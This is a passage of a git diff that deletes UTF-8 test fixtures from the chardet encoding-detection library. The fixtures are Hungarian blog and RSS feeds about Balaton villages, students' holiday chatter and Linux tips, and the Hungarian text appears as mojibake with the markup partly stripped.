    8321  Uzsa,  Lֳ¡zhegy u. 19.
    Email: PmhUzsa@hu.inter.net
    Phone: (70) 319-0397  P/F: (87) 436-140

    - -

    Az ֳ¶nkormֳ¡nyzat adatai

    - -

    eMagyarorszֳ¡g pont

    - -

    Basalt-Kֳ¶zֳ©pkֵ‘ Kֵ‘bֳ¡nyֳ¡k Kft.

    - -

    Uzsa a Lesence karnyֳ÷jtֳ¡snyira lֳ©vֵ‘ telepֳ¼lֳ©seivel kֳ¶zֳ¶sen a Balaton kֳ¶zelsֳ©gֳ©vel gazdag programokat kֳ­nֳ¡l a termֳ©szet szerelmeseinek.
    Jֳ³ pֳ©lda erre, a Lesencֳ©ktֵ‘l a Balatonig elnevezֳ©sֵ± hagyomֳ¡nyֵ‘rzֵ‘ szֳ¼reti felvonulֳ¡s a Lesence-tֳ©rsֳ©gben." A kֳ¶zponti rendezvֳ©nynek a felvonulֳ¡sok tֳ¶rtֳ©netֳ©ben elֵ‘szֳ¶r Uzsa adott otthont. (2004) A lovasokkal, traktorokkal, vidֳ¡m maskarֳ¡kba ֳ¶ltֳ¶zֳ¶tt emberekkel tarkֳ­tott menet Szigligetrֵ‘l indulva Hegymagason ֳ¡t a Lesence-rֳ©giֳ³ falvait ֳ©rintve jutott el Uzsֳ¡ra...
    Maskara - -
    Kovֳ¡cs Kֳ¡roly kֳ¶szֳ¶ntֵ‘jֳ©ben elmondta, bֳ¡r a telepֳ¼lֳ©sen a szֳ¼retnek nincsenek hagyomֳ¡nyai, mֳ©gis ֳ¶rֳ¼l annak, hogy a kistֳ©rsֳ©g tagjakֳ©nt hֳ¡zigazdֳ¡i lehetnek ennek az esemֳ©nynek. A szֵ‘lֵ‘t ugyan nem termesztik, de a bort az uzsaiak is nagyon szeretik." [balatonpress.com]

    - -

    Uzsa1 - -
    Az uzsai vadֳ¡szterֳ¼let eddigi legnagyobb szarvasbikֳ¡ja

    ]]>
    - - -"Balatonikum" -Ajֳ¡nlֳ³ -Balaton -Balaton & internet -Balatoni Lֳ¡tnivalֳ³ -Balatoni Szֳ¡llֳ¡s -Falusi turizmus -Programok -Tapolcai-medence -Turizmus -Tֳ¡jak, telepֳ¼lֳ©sek -UZSA -Vadֳsz -Zֳ¶ld: zֳ¶ldebb -ֳ–nkormֳ¡nyzֳ³ - -ivcsek -2006-01-02T07:24:32+01:00 -
    - -Szolgֳ¡lati kֳ¶lemֳ©ny: 2006 -http://balatonblog.typepad.com/balatonblog/2006/01/szolglati_klemn.html -Az ide visszatֳ©rֵ‘ olvasֳ³k majd egy hֳ³napon ֳ¡t nem talֳ¡ltak friss tartalmakat, azonban a statisztikֳ¡k azt mutatjֳ¡k: aki kereset talֳ¡lt ֳ©rdeklֵ‘dֳ©sֳ©nek megfelelֵ‘ anyagokat az archֳ­v bejegyzֳ©sek kֳ¶zֳ¶tt. A lֳ¡togatֳ³k nagy rֳ©sze vֳ©gigbֳ¶ngֳ©szte a Balaton-felvidֳ©k kistelepֳ¼lֳ©seit bemutatֳ³ szemelvֳ©nyeket. A kֳ¶zel egy hֳ³napos kiֳ¡llֳ¡st kֳ¶vetֵ‘en mֳ¡tֳ³l naponta ֳ÷jabb ֳ©s ֳ÷jabb telepֳ¼lֳ©sek kerֳ¼lnek sorra, hogy ֳ¡prilisig virtuֳ¡lis sֳ©tֳ¡mon elֳ©rjֳ¼k kiindulֳ³pontunkat. Miֳ©rt e falujֳ¡rֳ¡s? Mert mֳ¡jus elsֵ‘ napjaiban EXPEDֳCIֳ“RA indulok, hogy mֳ©g bֵ‘vebben - szemֳ©lyes benyomֳ¡saim alapjֳ¡n - szֳ¡molhassak be e tֳ¡jegysֳ©gek lֳ¡tnivalֳ³irֳ³l, mindennapjairֳ³l. A napi aktualitֳ¡sok tovֳ¡bbra is a megszokott helyen talֳ¡lhatֳ³k, aki pedig BALATONIKUMokra vֳ¡gyik az kutakodjֳ©k. Felkutattam ezen felֳ¼l nֳ©hֳ¡ny Balatonimֳ¡dֳ³t, hogy kֳ¶rֳ¼ket tovֳ¡bb bֵ‘vֳ­thessem...... -Az ide visszatֳ©rֵ‘ olvasֳ³k majd egy hֳ³napon ֳ¡t nem talֳ¡ltak friss -tartalmakat, azonban a statisztikֳ¡k azt mutatjֳ¡k: aki kereset talֳ¡lt -ֳ©rdeklֵ‘dֳ©sֳ©nek megfelelֵ‘ anyagokat az archֳ­v bejegyzֳ©sek kֳ¶zֳ¶tt.
    -A lֳ¡togatֳ³k nagy rֳ©sze vֳ©gigbֳ¶ngֳ©szte a Balaton-felvidֳ©k kistelepֳ¼lֳ©seit bemutatֳ³ szemelvֳ©nyeket.

    -

    4_2 - -
    -A kֳ¶zel egy hֳ³napos kiֳ¡llֳ¡st kֳ¶vetֵ‘en mֳ¡tֳ³l naponta
    ֳ÷jabb ֳ©s ֳ÷jabb -telepֳ¼lֳ©sek kerֳ¼lnek sorra, hogy ֳ¡prilisig virtuֳ¡lis sֳ©tֳ¡mon elֳ©rjֳ¼k -kiindulֳ³pontunkat.
    -Miֳ©rt e falujֳ¡rֳ¡s? Mert mֳ¡jus elsֵ‘ napjaiban EXPEDֳCIֳ“RA indulok, hogy -mֳ©g bֵ‘vebben - szemֳ©lyes benyomֳ¡saim alapjֳ¡n - szֳ¡molhassak be e -tֳ¡jegysֳ©gek lֳ¡tnivalֳ³irֳ³l, mindennapjairֳ³l.

    - -

    -A napi aktualitֳ¡sok tovֳ¡bbra is a megszokott helyen talֳ¡lhatֳ³k, aki pedig BALATONIKUMokra vֳ¡gyik az kutakodjֳ©k. Felkutattam ezen felֳ¼l nֳ©hֳ¡ny Balatonimֳ¡dֳ³t, hogy kֳ¶rֳ¼ket tovֳ¡bb bֵ‘vֳ­thessem...


    -
    -]]>
    - - - -ivcsek -2006-01-02T04:58:06+01:00 -
    - -LESENCEISTVֳND -http://balatonblog.typepad.com/balatonblog/2005/12/lesenceistvnd.html -A telepֳ¼lֳ©s a tapolcai medence peremֳ©n a keszthelyi hegysֳ©g lֳ¡bainֳ¡l fekszik.Kelet felֳµl vulkanikus hegyek lֳ¡ncolata ֳ©s a Bakony erdֳµi ֳ¶vezik. Sֳ¼meg felֵ‘l a 84-es szֳ¡mֳ÷ fֳµֳ÷t hatֳ¡rolja, amely csatlakozik a Balaton ֳ©szaki partjֳ¡n hֳ÷zֳ³dֳ³ 71-es fֳµֳ÷thoz. A Keszthely felֳµl ide ֳ©rkezֳµk szֳµlֳµhelyek kֳ¶zֳ¶tt kanyarogva, csodֳ¡latos panorֳ¡mֳ¡ban gyֳ¶nyֳ¶rkֳ¶dhetnek. Lakֳ³inak szֳ¡ma 1999. januֳ¡r 1-ֳ©n 946 fֳµ. A neve elֳµszֳ¶r 1328-ban Lessenche-Istvand nֳ©ven fordul elֳµ. Az Istvֳ¡nd helysֳ©gnֳ©v az Istvֳ¡n szemֳ©lynֳ©vbֳµl kֳ©pzֳµdֳ¶tt, a Lesence-elֳµtag a patak mellֳ©kre utal. A falu Lesence-patak mellֳ© telepֳ¼lt, hatֳ¡ra dombok alatt, erdֳµk ֳ©s nֳ¡dasok kֳ¶zֳ¶tt fekszik. A telepֳ¼lֳ©s urai a XIV. szֳ¡zadban a Dersfiek voltak, a XVI. szֳ¡zadban Csoron Andrֳ¡s ֳ©s leszֳ¡rmazֳ³i voltak a birtokosok, majd a falu ֳ©s kֳ¶rnyֳ©ke 1600-tֳ³l folyamatosan az Esterhֳ¡zy csalֳ¡d birtoka volt. A tֳ¶rֳ¶k mֳ¡r 1545-ben elfoglalta a telepֳ¼lֳ©st. 1553-tֳ³l a XVII. szֳ¡zadig az egֳ©sz szֳ¡ntֳ³i jֳ¡rֳ¡s a tֳ¶rֳ¶knek hֳ³dolt ֳ©s fizette az adֳ³t.A hosszabb lakott idֳµszak utֳ¡n, a tֳ¶rֳ¶k uralom vֳ©gֳ©n Lesenceistvֳ¡nd elnֳ©ptelenedett. 1692-ben kezdtֳ©k ֳ÷jratelepֳ­teni magyar lakossֳ¡ggal.[balatonfelvidek.celodin.hu] Lesenceistvֳ¡nd terֳ¼lete a Balaton vֳ­zgyֵ±jtֵ‘jֳ©hez tartozik. Legmagasabb pontja a Kֵ‘-orra hegy, amely 499 m magas. Ezen a hegyen megy keresztֳ¼l az orszֳ¡gos Kֳ©k-tֳ÷ra ֳ÷tvonal is, mely fontos ֳ¶sszekֳ¶ttetֳ©st jelent a Keszthelyi-hegysֳ©g kֳ©t oldala kֳ¶zֳ¶tt a gyalogos kirֳ¡ndulֳ³ turizmusban. Kiemelt rendezvֳ©nyei: a Mֳ©zga-fesztivֳ¡l (hֳ¡zi kֳ©szֳ­tֳ©sֵ±... -A telepֳ¼lֳ©s  "a tapolcai medence peremֳ©n a keszthelyi hegysֳ©g lֳ¡bainֳ¡l fekszik.
    Kelet -felֳµl vulkanikus hegyek lֳ¡ncolata ֳ©s a Bakony erdֳµi ֳ¶vezik. Sֳ¼meg felֵ‘l -a 84-es szֳ¡mֳ÷ fֳµֳ÷t hatֳ¡rolja, amely csatlakozik a Balaton ֳ©szaki -partjֳ¡n hֳ÷zֳ³dֳ³ 71-es fֳµֳ÷thoz. A Keszthely felֳµl ide ֳ©rkezֳµk szֳµlֳµhelyek -kֳ¶zֳ¶tt kanyarogva, csodֳ¡latos panorֳ¡mֳ¡ban gyֳ¶nyֳ¶rkֳ¶dhetnek. Lakֳ³inak -szֳ¡ma 1999. januֳ¡r 1-ֳ©n 946 fֳµ.

    - -

    X2lesenceistvand5k

    - -

    A neve elֳµszֳ¶r 1328-ban Lessenche-Istvand nֳ©ven fordul elֳµ. Az -Istvֳ¡nd helysֳ©gnֳ©v az Istvֳ¡n szemֳ©lynֳ©vbֳµl kֳ©pzֳµdֳ¶tt, a Lesence-elֳµtag -a patak mellֳ©kre utal. A falu Lesence-patak mellֳ© telepֳ¼lt, hatֳ¡ra -dombok alatt, erdֳµk ֳ©s nֳ¡dasok kֳ¶zֳ¶tt fekszik.

    - -

    A telepֳ¼lֳ©s urai a XIV. szֳ¡zadban a Dersfiek voltak, a XVI. -szֳ¡zadban Csoron Andrֳ¡s ֳ©s leszֳ¡rmazֳ³i voltak a birtokosok, majd a falu -ֳ©s kֳ¶rnyֳ©ke 1600-tֳ³l folyamatosan az Esterhֳ¡zy csalֳ¡d birtoka volt.

    - -

    A tֳ¶rֳ¶k mֳ¡r 1545-ben elfoglalta a telepֳ¼lֳ©st. 1553-tֳ³l a XVII. -szֳ¡zadig az egֳ©sz szֳ¡ntֳ³i jֳ¡rֳ¡s a tֳ¶rֳ¶knek hֳ³dolt ֳ©s fizette az adֳ³t.
    A -hosszabb lakott idֳµszak utֳ¡n, a tֳ¶rֳ¶k uralom vֳ©gֳ©n Lesenceistvֳ¡nd -elnֳ©ptelenedett. 1692-ben kezdtֳ©k ֳ÷jratelepֳ­teni magyar lakossֳ¡ggal."
    [balatonfelvidek.celodin.hu]

    - -

    X1keszhelyihegys1 - -

    - -

    "Lesenceistvֳ¡nd terֳ¼lete a Balaton vֳ­zgyֵ±jtֵ‘jֳ©hez tartozik. -Legmagasabb pontja a Kֵ‘-orra hegy, amely 499 m magas. Ezen a hegyen -megy keresztֳ¼l az orszֳ¡gos Kֳ©k-tֳ÷ra ֳ÷tvonal is, mely fontos -ֳ¶sszekֳ¶ttetֳ©st jelent a Keszthelyi-hegysֳ©g kֳ©t oldala kֳ¶zֳ¶tt a gyalogos -kirֳ¡ndulֳ³ turizmusban.

    - -

    Kiemelt rendezvֳ©nyei: a -Mֳ©zga-fesztivֳ¡l (hֳ¡zi kֳ©szֳ­tֳ©sֵ± traktorok bemutatֳ³ja ֳ©s versenye), -BMW-talֳ¡lkozֳ³, Falunap, ֳ©s a Hagyomֳ¡nyos Szֳ¼reti Felvonulֳ¡s (a -szomszֳ©dos kֳ¶zsֳ©gekkel egyֳ¼tt)" [iranymagyarorszag.hu]

    - -

    Lֳ¡tnivalֳ³k:

    - -

    A pֳ¡los kolostort 1330 kֳ¶rֳ¼l alapֳ­tottֳ¡k, de az egyetlen -magyar alapֳ­tֳ¡sֳ÷ szerzetesrend itteni tagjai a tֳ¶rֳ¶k veszֳ©ly miatt -elhagytֳ¡k az ֳ©pֳ¼letet, mely ֳ­gy az enyֳ©szetֳ© lett. [vendegvaro.hu]

    - -

    A Szent Jakab apostol tiszteletֳ©re szentelt rֳ³mai katolikus temploma kֳ¶zֳ©pkori eredetֵ±, -(mֵ±emlֳ©ki vֳ¶rֳ¶smֳ¡rvֳ¡ny keresztelֵ‘kֳ÷t ֳ©s a szintֳ©n mֵ±emlֳ©kkֳ©nt vֳ©dett -fasֳ­pos orgona) 1755-ben ֳ©pֳ­tettֳ©k ֳ÷jra; vֳ©gleges, kֳ©sֵ‘ barokk formֳ¡jֳ¡t -1788-ban nyerte el. [vendegvaro.hu]

    - -

    X4304442c3Bֳ¡lint Sֳ¡ndor Egyhֳ¡zi Gyֵ±jtemֳ©ny
    Mֳ¡ria-kֳ¡polna kilֳ¡tֳ³
    Mֳ¡tֳ©-kֳ÷t forrֳ¡s
    Szenthֳ¡romsֳ¡g-szobor
    az I. ֳ©s II. vilֳ¡ghֳ¡borֳ÷ban elhunyt hֵ‘sֳ¶k emlֳ©kmֵ±vei

    - -

    X9105002 - -

    - -

    Emlֳ­tֳ©st ֳ©rdemelnek a kavicsbֳ¡nyֳ¡k melyek a hozzֳ¡ֳ©rtֵ‘ ֳ©rdeklֵ‘dֵ‘k szֳ¡mֳ¡ra fֳ¶ldtani bemutatֳ³ul szolgֳ¡lhatnak. Mindkֳ©t bֳ¡nya a Balatonfelvidֳ©ki Nemzeti Park terֳ¼letֳ©re esik. Ez a Billegֳ©n lֳ©vֵ‘ fֳ¶ldtani ֳ¶rֳ¶ksֳ©gֳ¼nk ritka kֳ¼lֳ¶nlegessֳ©g , egy tanֳ¶svֳ©nyt  mindenkֳ©ppen megֳ©rdemelne.

    - -

    X3madbull - -

    - -

    Ha valami, akkor a helyi serdֳ¼lֵ‘ baseball csapat (orszֳ¡gos -2.) tevֳ©kenysֳ©ge biztatֳ³ perspektֳ­vֳ¡t mutat, ֳ­gֳ©retes -telepֳ¼lֳ©s-marketing elemmֳ© vֳ¡lhat: a mֳ©dia figyelmֳ©t Lesenceistvֳ¡ndra -vonhatja.

    - -

    Mint a kֳ¶rnyֳ©ken ֳ¡ltalֳ¡ban itt is talֳ¡lunk minֵ‘sֳ©gi borokat, eMagyarorszֳ¡g pontot pont. A falun ֳ¡thaladֳ³ tֳ÷raֳ÷tvonallal kapcsolatos informֳ¡ciֳ³kat pedig itt talֳ¡lhatjuk. Szֳ¡llֳ¡shelyrֵ‘l nem szereztem tudomֳ¡st, a kֳ¶zeli telepֳ¼lֳ©seken biztosan talֳ¡lunk szobֳ¡t.

    - -

    Az ֳ¶nkormֳ¡nyzat ֳ©s adatai

    - -

    Tֳ‰RKֳ‰P

    - -

    Eladֳ³:
    Eladֳ³ nyaralֳ³, Lesenceistvֳ¡nd
    Tapolcֳ¡tֳ³l 4 km-re 2004-ben ֳ÷jjֳ¡ֳ©pֳ­tett patakpartjֳ¡n ֳ¡llֳ³ malomֳ©pֳ¼letet
    Lesenceistvֳ¡ndhegyen egy nֳ¡dtetֵ‘s prֳ©shֳ¡z nagy ֳ©s bֵ‘vֳ­thetֵ‘ telekkel eladֳ³.

    ]]>
    - - -Ajֳ¡nlֳ³ -Aktֳ­v & Sport -Balaton -Balaton & internet -Balatoni Gyalog -Balatoni Lֳ¡tnivalֳ³ -Balatoni Tֳ©rkֳ©p -Balatoni bor -Bicikli Balatoni -Falusi turizmus -Ingatlan -Programok -Tapolcai-medence -Tֳ¡jak, telepֳ¼lֳ©sek -Zֳ¶ld: zֳ¶ldebb -ֳ–nkormֳ¡nyzֳ³ - -ivcsek -2005-12-05T18:26:59+01:00 -
    - - -
    diff --git a/chardet/tests/utf-8/boobooo.blogspot.com.xml b/chardet/tests/utf-8/boobooo.blogspot.com.xml deleted file mode 100644 index c8cbf39..0000000 --- a/chardet/tests/utf-8/boobooo.blogspot.com.xml +++ /dev/null @@ -1,196 +0,0 @@ - - - - - - -Boobooo -Just another stupid blog - -tag:blogger.com,1999:blog-5716684 -2006-01-04T05:23:52Z -Blogger - -
    This is an Atom formatted XML site feed. It is intended to be viewed in a Newsreader or syndicated to another site. Please visit the Blogger Help for more info.
    -
    -true - - - -rekuci - -2006-01-04T06:22:00+01:00 -2006-01-04T05:23:52Z -2006-01-04T05:23:52Z - -tag:blogger.com,1999:blog-5716684.post-113635223271256327 -nanֳ¡ h.itthon vaok.De lehet h.felhֳ­vlak ma vizsga ... - -
    nanֳ¡ h.itthon vaok.De lehet h.felhֳ­vlak ma vizsga utֳ¡n,mert ֳ÷gyis benn vaok,meg te is szal ֳ¶sszefut6nֳ¡nk.Tiszta kֳ³ma vagyok.ֳ‰s hogy van a Gֳ¡bor?Mֳ¡r visszament???Ziz esetleg ha el tudlak ֳ©rni remֳ©lem egy kocsmatֳ÷rֳ¡ba benne vagy...mert dֳ÷rva karֳ¡csonyom ֳ©s szilveszterem volt:(
    -
    -false -
    - - - -Zitus - -2006-01-03T20:18:00+01:00 -2006-01-03T19:27:16Z -2006-01-03T19:27:16Z - -tag:blogger.com,1999:blog-5716684.post-113631643633955758 -buֳ©k nektek csajok! ֳ­gy utֳ³lag is. -jaj-jaj, nagyon... - -
    buֳ©k nektek csajok! ֳ­gy utֳ³lag is. -jaj-jaj, nagyon szֳ¶rnyen kivagyok. bocs, kati, hogy nem hֳ­vtalak vissza, pedig jֳ³ֳ³ֳ³ֳ³ lett volna egy nagyot partizni, tanulni, ֳ÷gysem tanultam. :) olyan beteg voltam, hֵ±ֵ±ֵ±. kֳ©pzeljֳ©tek, kaptam egy kis gyomorhurutot, ami egyenes ֳ÷t a gyomorfekֳ©lyhez. :) pedig mֳ©g el sem kezdֵ‘dֳ¶ttt rendesen a vizsgaidֵ‘szak, ֳ©s ֳ©n mֳ¡r a kefֳ©t rֳ¡gom. -most is kettֵ‘re tanulok egyszerre,
    -
    -false -
    - - - -Kathy - -2006-01-03T18:10:00+01:00 -2006-01-03T17:13:54Z -2006-01-03T17:13:54Z - -tag:blogger.com,1999:blog-5716684.post-113630843449099599 -az amugy -csak szereti magat biztonsagban tudni (am... - -
    az amugy -csak szereti magat biztonsagban tudni (amugy meg nem durrogtat ijesztgetesbol mindenfele) - -mielott visszamentem debr-be tegnap, talalkoztam a gaborral :) aszonta, h a sztavi is megy vele mikor visszamegy karlsruhe-be... -eeeeenisakaroook utazniiii! - -megcsodaltam az itteni karacsonyfat (mar ami maradt belole), leettem rola az osszes konyakmeggyet, plejsztesonoztem, tanulni valahogy nem megy
    -
    -false -
    - - - -rekuci - -2006-01-02T18:29:00+01:00 -2006-01-02T17:30:39Z -2006-01-02T17:30:39Z - -tag:blogger.com,1999:blog-5716684.post-113622303980230462 -Mintha a Ziz ASZONDTA VOLNA HOGY LESZ A LOVARDֳBA ... - -
    Mintha a Ziz ASZONDTA VOLNA HOGY LESZ A LOVARDֳBA VALAMILYEN PARTI....De ez nem bizti...,mֳ©rt van pisztolya a barֳ¡todnak?aszittem valami szֳ¡mtech zseni...:)
    -
    -false -
    - - - -Kathy - -2006-01-01T22:31:00+01:00 -2006-01-01T21:34:15Z -2006-01-01T21:34:15Z - -tag:blogger.com,1999:blog-5716684.post-113615125567344016 -vegre sikerult megnezni az 50 elso randit :) - -ja e... - -
    vegre sikerult megnezni az 50 elso randit :) - -ja es Zizi, neked is boldog uj evet... :) oda akartam adni a karacsonyi ajandekod, de nem valaszoltal hogy mikor lenne jo. hivtalak tegnap, mert mondtad hogy bulizni szeretnel szilveszterkor es hatha meg nincs programod, de nem vetted fel a telefont... -most meg megyek debrecenbe... namind1, majd legkozelebb
    -
    -false -
    - - - -Kathy - -2006-01-01T20:51:00+01:00 -2006-01-01T20:29:16Z -2006-01-01T20:29:13Z - -tag:blogger.com,1999:blog-5716684.post-113614735324721032 -boldogujevetmindenkinek - -Nekem boldog uj evem volt... - -
    boldogujevetmindenkinek - -Nekem boldog uj evem volt, jo (de azert felejtheto) bulival... :) de fo, hogy csinaltunk vmit. - -Ugy kezdodott, hogy 30-an, a nagy hofuvas es iteletido kozepette eljott hozzank a roland (hm elso meeting a szulokkel). leginkabb attol feltem hogy anyam majd korulrajongja, de szerencsere ez csak mersekelten volt igy... -A masik erdekes dolog az volt, mikor kirakta a pisztolyt
    -
    -false -
    - - - -rekuci - -2005-12-30T06:33:00+01:00 -2005-12-30T05:34:13Z -2005-12-30T05:34:13Z - -tag:blogger.com,1999:blog-5716684.post-113592085338238556 -Szem hosszabb idֵ‘ sem tֵ±nik annyinak amennyi...szt... - -
    Szem hosszabb idֵ‘ sem tֵ±nik annyinak amennyi...sztem....
    -
    -false -
    - - - -Kathy - -2005-12-29T23:08:00+01:00 -2005-12-29T22:20:44Z -2005-12-29T22:20:44Z - -tag:blogger.com,1999:blog-5716684.post-113589484494380107 -En is megkaptam parszor ezt az emailt... (mar ket ... - -
    En is megkaptam parszor ezt az emailt... (mar ket evvel ezelott is) -de hulye kerdesekre nem valaszolok :))) - -27-en elmentem itthonrol es ma jottem haza. -persze ez a harom nap jol telt... :) leszamitva hogy fogorvoshoz es szemeszhez kellett menni, elobbit nem miattam, utobbit miattam, de termeszetesen azt nem sikerult elintezni ami miatt mentem... -Megneztuk a Schindler listajat :( en most lattam
    -
    -false -
    - - - -rekuci - -2005-12-28T11:55:00+01:00 -2005-12-28T11:03:06Z -2005-12-28T11:03:06Z - -tag:blogger.com,1999:blog-5716684.post-113576778662509236 -Najֳ³,elegem van azokbֳ³laz emilekbֵ‘l is,amiket mind... - -
    Najֳ³,elegem van azokbֳ³laz emilekbֵ‘l is,amiket mindenki kֳ¼ldֳ¶zget,h.ֳ­rjak magamrֳ³l,ilyen hֳ¼lye kֳ©rdֳ©sekre vֳ¡laszt,szal aki kֳ­vֳ¡ncsi rֳ¡,itt kֳ¶zlֳ¶m azokra a kֳ©rdֳ©sekre amikre emlֳ©xem -Hֳ¡ny ֳ³ra van? -Nekem nincs egy se....zavarna a tanulֳ¡sba h.baszom el az idֵ‘m hֳ¼lyesֳ©gek ֳ­rogatֳ¡sֳ¡val...de asszem olyan 12.Ez a kֳ©rdֳ©s 2szer szerepelt,szal mֳ©geccer 12. -Kedvenc szֳ­nem? -mittomֳ©n,szeretem a szֳ­neket. -Tֳ©l
    -
    -false -
    -
    diff --git a/chardet/tests/utf-8/linuxbox.hu.xml b/chardet/tests/utf-8/linuxbox.hu.xml deleted file mode 100644 index 625c101..0000000 --- a/chardet/tests/utf-8/linuxbox.hu.xml +++ /dev/null @@ -1,188 +0,0 @@ - - -]> - - - linuxbox.hu - Linux aprֳ³sֳ¡gok gyֵ±jtemֳ©nye - http://linuxbox.hu - Linux hasznֳ¡lata kֳ¶zben talֳ¡lkoztam az itt bemutatott aprֳ³sֳ¡gokkal. Elkezdem gyֵ±jtֳ¶getni ֵ‘ket, mivel voltak kֳ¶ztֳ¼k amelyeket csak ritkֳ¡n hasznֳ¡ltam ֳ©s ֳ÷jra ֳ©s ֳ÷jra elֵ‘ kellett ֳ¡snom mikor ֳ÷jfent szֳ¼ksֳ©gem volt rֳ¡juk. Itt prֳ³bֳ¡lom rendszerben, kֳ¶nnyen elֳ©rhetֵ‘, kereshetֵ‘ mֳ³don gyֵ±jtֳ¶getni tovֳ¡bb tapasztalataim magam ֳ©s mֳ¡sok okulֳ¡sֳ¡ra. -Szerencsֳ©re egyre tֳ¶bben hasznֳ¡lnak nap-mint-nap linuxot. Biztos vagyok abban, hogy <strong>Nektek</strong> is vannak trֳ¼kkjeitek, tapasztalataitok amiket szֳ­vesen megosztanֳ¡tok mֳ¡sokkal. <a href="/gyik">Csatlakozz</a> Te is ֳ©s mutasd meg milyen szoftvereket hogyan hasznֳ¡lsz kedvenc operֳ¡ciֳ³s rendszereden! Avagy kֳ­vֳ¡nom tֳ¶ltsd kellemesen idֵ‘d bֳ¶ngֳ©szgetֳ©ssel weblapomon! - hu - - Hogyan fordֳ­thatunk arhitektֳ÷ra optimalizֳ¡lt debian csomagokat. - http://linuxbox.hu/apt-build - <p>Az apt-build debian csomag segֳ­tsֳ©gֳ©vel gentoo stֳ­lusֳ÷ architektֳ÷rֳ¡ra optimalizֳ¡lt debian csomagokat kֳ©szֳ­thetֳ¼nk magunknak.<br /> -Telepֳ­tsֳ¼k fel elֵ‘szֳ¶r a csomagot.<br /> -<code ><br /> - $ wajig install apt-build<br /> -</code><br /> -kֳ¶zben kֳ©rdez bennֳ¼nk pֳ¡r opciֳ³rֳ³l, ezek a <em >/etc/apt/apt-build.conf</em> ֳ¡llomֳ¡nyba kerֳ¼lnek lementֳ©sre:<br /> -<code ><br /> - build-dir = /var/cache/apt-build/build<br /> - repository-dir = /var/cache/apt-build/repository<br /> - Olevel = -O2<br /> - march = -march=pentium4<br /> - mcpu = -mcpu=pentium4<br /> - options = " "<br /> -</code><br /> -Az elkֳ©szֳ¼lt csomagok a <em >/var/cache/apt-build/repository</em> kֳ¶nyvtֳ¡rba kerֳ¼lnek. Innֳ©t aztֳ¡n egyszerֵ±en telepֳ­thetjֳ¼k is ֵ‘ket, ha beadjuk a kֳ¶vetkezֵ‘ sort a <em >/etc/apt/sources.list</em> konfigurֳ¡ciֳ³s ֳ¡llomֳ¡nyunk elejֳ©re. (apt-build telepֳ­tֳ©se kֳ¶zben automatikusan is megtehettֳ¼k ezt.)</p> - - Debian - Tue, 03 Jan 2006 16:53:41 -0500 - - - Egy pehelysֳ÷lyֳ÷ rendszermonitor - http://linuxbox.hu/conky - <a href="conky"><div class="image thumbnail"><img src="http://linuxbox.hu/files/images/conky.thumbnail.png" width="140" height="200" alt="Egy pehelysֳ÷lyֳ÷ rendszermonitor" title="Egy pehelysֳ÷lyֳ÷ rendszermonitor" /></div> -</a><p>Szֳ¡mֳ­tֳ³gֳ©pֳ¼nk aktuֳ¡lis ֳ¡llapotֳ¡rֳ³l tֳ¶bb szoftver segֳ­tsֳ©gֳ©vel is kaphatunk informֳ¡ciֳ³kat. Engettessֳ©k meg nekem bemutatni egy ֳ÷jabbat(ֳ¡ltalam mֳ©g nem ismert): <a href="http://conky.sourceforge.net/">conky</a></p> -<p>Szolgֳ¡latatֳ¡sai:<br /> - - X gyֳ¶kֳ©r ablakra kֳ©pes rajzolni ֳ©s sajֳ¡t ablakba is.<br /> - - Szinte bֳ¡rmit kֳ©pes megjelenֳ­teni, szenzorok eredmֳ©nyeitֵ‘l, egyֳ©b szoftverek, szkriptek kimenetֳ©ig.<br /> -- Lֳ©tezik belֵ‘le debian ֳ©s gentoo csomag!</p> - - egyֳ©b - Mon, 02 Jan 2006 14:35:32 -0500 - - - Beesoft Commander ver. 2.02.1 - http://linuxbox.hu/bsc - <p><a href="http://freshmeat.net/projects/besc/?branch_id=61879&amp;release_id=214566">Frisshֳ÷s-weben</a> akadtam rֳ¡ egy ֳ÷jabb X-es ֳ¡llomֳ¡ny kezelֵ‘ progira: <a href="http://www.beesoft.org/bsc.html">Beesoft Commander</a> Kiprֳ³bֳ¡lni mֳ©g nem volt idֵ‘m, de rֳ¶videsen megteszem ֳ©s fissֳ­tem a cikkem. <img src="misc/smileys/smile.png" title="Vigyor" alt="Vigyor" /></p> - - X - Wed, 14 Dec 2005 15:27:33 -0500 - - - Drupal 4.6.5 - http://linuxbox.hu/drupal_4.6.5 - <p>Ezek a drupalos fiֳ÷k megint kaidtak egy ֳ÷jabb frissitֳ©st ez alkalommal nem biztonsֳ¡gi, hanem foltozֳ³ verziֳ³t.<br /> -Mֳ¡r rutinbֳ³l megy, feltoltam.</p> - - Drupal - Mon, 12 Dec 2005 13:21:42 -0500 - - - Bֳ¡rmit a tֳ¡lcֳ¡ra; alltray! - http://linuxbox.hu/alltray - <p><a href="http://alltray.sourceforge.net/">AllTray</a> nevֵ± kis szoftverrel bֳ¡rmely alkalmazֳ¡s dokkolhatֳ³ a rendszer tֳ¡lcֳ¡ra. Mֳ©g a Mozilla Thunderbird, Evolution, vagy akֳ¡r egy terminֳ¡l is. Egy kiemelֳ©s funkciֳ³ segֳ­t tisztֳ¡n lֳ¡tni mely alkalmazֳ¡s a "bezֳ¡rֳ¡s" gombra csak tֳ¡lcֳ¡ra kerֳ¼l mֵ±kֳ¶dֳ©s befejezֳ©s helzett. Alkalmazֳ¡sunk szֳ©pen egyֳ¼ttmֵ±kֳ¶dik Gnome-mal, KDEvel, XFCE 4-gyel, Fluxboxxal, and WindowMakerrel. </p> -<p>Debian SID, Ubuntu, Suse csomagok <a href="http://alltray.sourceforge.net/downloads.html">letֳ¶lthetֵ‘ek</a>!</p> - - X - Sat, 10 Dec 2005 17:44:17 -0500 - - - KDE - http://linuxbox.hu/node/112 - <p>hello<br /> -az lenne a kֳ©rdֳ©sem, hogy hogyan tudok kde alatt ilyen "kmenu buttont" csinֳ¡lni<br /> -<a href="http://nagy7.freebase.hu/kmenu.jpg">a kֳ©p itt</a></p> - - Linux segֳ­tsֳ©g - Thu, 08 Dec 2005 07:55:16 -0500 - - - Drupal 4.6.4 - http://linuxbox.hu/drupal_4.6.4 - <p>Kijֳ¶tt egy ֳ÷jabb javֳ­tֳ³ verziֳ³. Frissֳ­tֳ©s megtֳ¶rtֳ©nt.</p> - - Drupal - Fri, 02 Dec 2005 07:29:49 -0500 - - - Ipod/zene menedzselֳ©s - YamiPod - http://linuxbox.hu/YamiPod - <a href="YamiPod"><div class="image thumbnail"><img src="http://linuxbox.hu/files/images/Yamipod_main.thumbnail.PNG" width="200" height="128" alt="Ipod/zene menedzselֳ©s - YamiPod" title="Ipod/zene menedzselֳ©s - YamiPod" /></div> -</a><p>Kellemes 